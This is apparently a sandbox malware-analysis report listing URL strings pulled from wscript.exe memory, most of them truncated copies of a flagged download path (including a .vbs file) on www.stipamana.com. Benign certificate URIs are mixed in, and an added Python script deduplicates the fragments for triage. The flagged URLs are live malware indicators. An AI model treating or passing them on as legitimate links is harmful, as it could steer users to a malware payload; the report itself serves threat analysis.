https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs | true | Avira URL Cloud: malware | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.stipamana.coUwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/swscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://ocsp.entrust.net03wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfswscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdhfywscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkcwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.stipamana.com/exgdwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdswscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/wscript.exe, 00000004.00000002.381039566.00000000004E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380806996.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381024749.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380792890.000000000037F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380778563.00000000003B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380833098.00000000037DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381013256.0000000000367000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380774855.0000000003791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.000000000039C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380789851.000000000038C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380800231.00000000003B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380708506.00000000037AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.00000000037C6000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdLwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhywscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://crl.usertruHwscript.exe, 00000004.00000003.380859681.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.0000000003856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003856000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdh00wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/hwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.stipamana.com/exZZwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://ocsp.entrust.net0Dwscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.stipamana.comwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/stywscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwYwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://www.stipamana.com/exgLLwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.entrust.net/server1.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsbwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjfwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhyswscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/stwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrFwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfxwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
URL: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://www.stipamana.com/exgdhfyjhyds
Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/do
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgx
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/eii
Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.s
Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus: Avira URL Cloud: safe
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjh
Source: wscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsf
Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/ww
Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsk
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknN
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjf
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgw
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhy
Source: wscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskf
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styha
Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwe
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://github.com/syohex/java-simple-mine-sweeperC:
Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqk
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgt
Source: wscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://secure.comodo.com/CPS0
Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://www.stipamana.c
Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjg
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjq
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown

URL: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/d
Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus: Avira URL Cloud: malware
Reputation: unknown
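Most of the 27 URL strings above are truncated copies of a single download path on www.stipamana.com, read out of wscript.exe memory at different moments, plus a few certificate URIs (CRL distribution points and a CPS pointer) that any process loading a signed binary carries. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it takes the URL and Malicious columns transcribed from the table, drops every string that is a proper prefix of a longer one, and separates certificate strings from real network candidates. The explanation of the trailing "0" on the certificate URIs as DER residue is an assumption stated in the code.

```python
"""Collapse memory-string URL fragments from a sandbox URL table into distinct candidates.

Added example (not from the report or the sample). FRAGMENTS is constructed from
the URL and Malicious columns of the table above.
"""
from urllib.parse import urlsplit

FRAGMENTS = [
    ("http://crl.pkioverheid.nl/DomOvLatestCRL.crl0", False),
    ("https://www.stipamana.com/exgdhfyjhyds", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/do", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgx", True),
    ("https://www.stipamana.com/eii", False),
    ("https://www.stipamana.s", False),
    ("https://www.stipamana.com/exgdhfyjhydsfjh", True),
    ("https://www.stipamana.com/exgdhfyjhydsf", True),
    ("https://www.stipamana.com/ww", False),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsk", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknN", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjf", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgw", True),
    ("https://www.stipamana.com/exgdhfyjhy", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskf", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styha", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwe", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$", True),
    ("https://github.com/syohex/java-simple-mine-sweeperC:", False),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqk", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgt", True),
    ("https://secure.comodo.com/CPS0", False),
    ("https://www.stipamana.c", False),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjg", True),
    ("http://crl.entrust.net/2048ca.crl0", False),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjq", True),
    ("https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/d", True),
]

# Path suffixes of URIs that live inside X.509 certificates rather than in the
# sample's own code. Assumption: the trailing "0" is the 0x30 (ASN.1 SEQUENCE)
# tag byte that follows the URI in the DER-encoded extension, picked up as
# part of the string by the memory scanner.
CERT_PATH_SUFFIXES = (".crl", ".crl0", "/cps", "/cps0")


def is_cert_artifact(url):
    """True for CRL distribution points and CPS pointers carried by signed binaries."""
    return urlsplit(url).path.lower().endswith(CERT_PATH_SUFFIXES)


def collapse(fragments):
    """Drop every string that is a proper prefix of another string in the list.

    Returns (url, malicious, subsumed) tuples, longest URL first, where
    subsumed counts the shorter fragments that are prefixes of this one.
    """
    urls = [u for u, _ in fragments]
    flag = dict(fragments)
    kept = []
    for u in urls:
        if any(o != u and o.startswith(u) for o in urls):
            continue  # truncated copy of a longer string; nothing new in it
        subsumed = sum(1 for o in urls if o != u and u.startswith(o))
        kept.append((u, flag[u], subsumed))
    kept.sort(key=lambda t: (-len(t[0]), t[0]))
    return kept


def triage(fragments):
    """Split the surviving strings into certificate noise and network candidates."""
    cert, network = [], []
    for row in collapse(fragments):
        (cert if is_cert_artifact(row[0]) else network).append(row)
    return cert, network


if __name__ == "__main__":
    cert, network = triage(FRAGMENTS)
    print(f"{len(FRAGMENTS)} fragments -> {len(cert)} certificate strings, {len(network)} candidates")
    for url, malicious, subsumed in network:
        print(f"  malicious={str(malicious):5} subsumes={subsumed:2d}  {url}")
```

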